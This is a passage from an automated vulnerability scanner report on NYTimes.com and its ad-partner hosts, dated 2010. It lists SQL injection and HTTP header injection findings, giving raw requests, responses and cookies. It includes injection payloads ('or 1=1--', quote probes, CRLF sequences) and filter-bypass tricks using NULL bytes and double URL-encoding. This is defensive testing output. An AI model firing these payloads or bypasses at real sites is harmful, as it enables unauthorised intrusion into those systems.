h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2%00''&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 434

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black
...[SNIP]...

1.3. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5739.NYTimes.com/B4990972.8

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 71268400%20or%201%3d1--%20 and 71268400%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto=&171268400%20or%201%3d1--%20=1 HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/2215498/TKO_TorchBrowser_728x90_FY11_Q3_Flash40.swf";
var gif = "http://s0.2mdn.net/2215498/TKO_TorchBrowser_728x90_FY11_Q3_Static.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a51/7/0/%2a/l%3B232242348%3B0-0%3B0%3B56070716%3B3454-728/90%3B39188650/39206437/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148363_248885%3B%3B%7Esscs%3D%3fhttp://us.blackberry.com/smartphones/blackberrytorch.jsp?CPID=STBANNAUSFY11Q3000000130300000960010003BAN001");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();

var defaultCtVal = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a51/7/0/%2a/l%3B232242348%3B0-0%3B0%3B56070716%3B3454-728/90%3B39188650/39206437/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt148363_248885%3B%3B%7Esscs%3D%3fhttp://us.blackberry.com/smartphones/blackberrytorch.jsp?CPID=STBANNAUSFY11Q3000000130300000960010003BAN001");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTag";
ctv[0] = "";

var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a51/7/0/%2a/l%3B232242348%3B0-0%3B0%3B
...[SNIP]...

Request 2

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto=&171268400%20or%201%3d2--%20=1 HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:52:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 434

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.blackberry.com/smartphones/blackberrytorch.jsp?CPID=STBANNAUSFY11Q3000000130399999999999003BAN007"><img src="http://s0.2mdn.net/viewad/2215498/BAN_TorchBrowser_728x90_FY11_Q3_Static.jpg" border=0 alt="Click here to find out more!"></a>');

1.4. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [opzn&page parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5739.NYTimes.com/B4990972.8

Issue detail

The opzn&page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the opzn&page parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel'&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel''&pos=TopAd&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 434

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black
...[SNIP]...

1.5. http://ad.vulnerable.ad.partner/adj/N5739.NYTimes.com/B4990972.8 [pos parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ad.vulnerable.ad.partner
Path:	/adj/N5739.NYTimes.com/B4990972.8

Issue detail

The pos parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pos parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd%00'&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5579

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/N5739.NYTimes.com/B4990972.8;click=;sz=728x90;pc=nyt148363_248885;ord=2010.11.13.01.45.10;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/yr/mo/day/travel&pos=TopAd%00''&camp=BB_RIMFY11q3NAUSEApps-1549654-nyt2&ad=RIMFY11q3NAUSEApps.ROS.dart728x90.PreEmpt&sn2=200dd626/e68b4160&snr=doubleclick&snx=1289611278&sn1=59bd0e33/d0d20519&goto= HTTP/1.1
Accept: */*
Referer: http://travel.nytimes.com/2010/11/14/travel/14seoul-hours.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:49:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 434

document.write('<a target="_top" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/0/%2a/h;232242348;1-0;0;56070716;3454-728/90;39189060/39206847/1;;~okv=;pc=nyt148363_248885;;~sscs=%3fhttp://us.black
...[SNIP]...

1.6. http://amch.questionmarket.com/adscgen/sta.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adscgen/sta.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adscgen/sta.php%2527?survey_num=787369&site=1922996&code=4005086&ut_sys=eb\ HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0
Cookie: ES=804109-(L!hM-0_774151-WL!hM-KC_787169-"f!hM-0_725378-j:!hM-0_788852-@k/hM-0_787369-Q>XiM-kg1; CS1=38159205-51-1_600001395264-17-1_774151-1-1_500003624638-4-1_200179372880-7-1_600001405589-7-1_500004005086-3-3_787369-1-3;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:49:02 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1410

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
</a>
about the error.

</dd>
...[SNIP]...

Request 2

GET /adscgen/sta.php%2527%2527?survey_num=787369&site=1922996&code=4005086&ut_sys=eb\ HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922996&PluID=0&w=300&h=250&ord=2010.11.13.01.44.23&ucm=true&z=0
Cookie: ES=804109-(L!hM-0_774151-WL!hM-KC_787169-"f!hM-0_725378-j:!hM-0_788852-@k/hM-0_787369-Q>XiM-kg1; CS1=38159205-51-1_600001395264-17-1_774151-1-1_500003624638-4-1_200179372880-7-1_600001405589-7-1_500004005086-3-3_787369-1-3;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 01:49:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 308
Keep-Alive: timeout=120, max=267
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adscgen/sta.php%27%27 was not found on this server.<
...[SNIP]...

2. HTTP header injection previous next
There are 82 instances of this issue:

http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
http://50.xg4ken.com/media/redir.php [url[] parameter]
http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [Pos parameter]
http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [eyeblaster cookie]
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [flv parameter]
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [res parameter]
http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp [wmpv parameter]
http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]
https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 3]
https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 4]
https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 5]
https://careers.nytco.com/psc/TAM/EMPLOYEE/HRMS/c/HRS_HRAM.HRS_CE.GBL [REST URL parameter 6]
http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 1]
http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 2]
http://movies2.nytimes.com/gst/movies/movie.html [REST URL parameter 3]
http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [11;4;;8;;cmwtbr;1lqc0s;;dml15;;1;/i/c?0&pq parameter]
http://na.link.decdna.net/n/78471/87266/ad.vulnerable.ad.partner/dfwcxw [REST URL parameter 4]
http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 1]
http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 2]
http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 3]
http://nytimes.com/ref/membercenter/help/infoservdirectory.html [REST URL parameter 4]
http://nytimes.com/rss [REST URL parameter 1]
http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 3]
http://pixel2519.everesttech.net/2519/rq/3/c_a8ccd1264e488999b21c12b5c7cd18c1_5314096229/url=http:/clickserve.dartsearch.net/link/click [REST URL parameter 4]
http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 1]
http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 2]
http://theater2.nytimes.com/gst/theater/tabclist.html [REST URL parameter 3]
http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 2]
http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 3]
http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 4]
http://topics.nytimes.com/top/news/business/companies/facebook_inc/ [REST URL parameter 5]
http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 2]
http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 3]
http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 4]
http://topics.nytimes.com/top/news/international/countriesandterritories/afghanistan/ [REST URL parameter 5]
http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 2]
http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 3]
http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 4]
http://topics.nytimes.com/top/news/international/countriesandterritories/haiti/ [REST URL parameter 5]
http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 2]
http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 3]
http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 4]
http://topics.nytimes.com/top/news/science/topics/globalwarming/ [REST URL parameter 5]
http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 2]
http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 3]
http://topics.nytimes.com/top/opinion/editorialsandoped/editorials/ [REST URL parameter 4]
http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 2]
http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 3]
http://topics.nytimes.com/top/opinion/editorialsandoped/letters/ [REST URL parameter 4]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 2]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 3]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 4]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/ [REST URL parameter 5]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 2]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 3]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 4]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 5]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/paulkrugman/ [REST URL parameter 6]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 2]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 3]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 4]
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/contributors/ [REST URL parameter 5]
http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 2]
http://topics.nytimes.com/top/reference/timestopics/ [REST URL parameter 3]
http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 2]
http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 3]
http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 4]
http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 5]
http://topics.nytimes.com/top/reference/timestopics/organizations/p/park51/ [REST URL parameter 6]
http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 2]
http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 3]
http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 4]
http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 5]
http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 6]
http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 2]
http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 3]
http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 4]
http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 5]
http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 6]
http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 7]

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

2.1. http://50.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://50.xg4ken.com
Path:	/media/redir.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 3ad15%0d%0a1c8f5fba2b9 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /media/redir.php?prof=593&camp=15226&affcode=cr5943&cid=6211890421&networkType=content&url[]=http%3A%2F%2Fwww.perpetual.com.au%2Finvestors.aspx&3ad15%0d%0a1c8f5fba2b9=1 HTTP/1.1
Host: 50.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
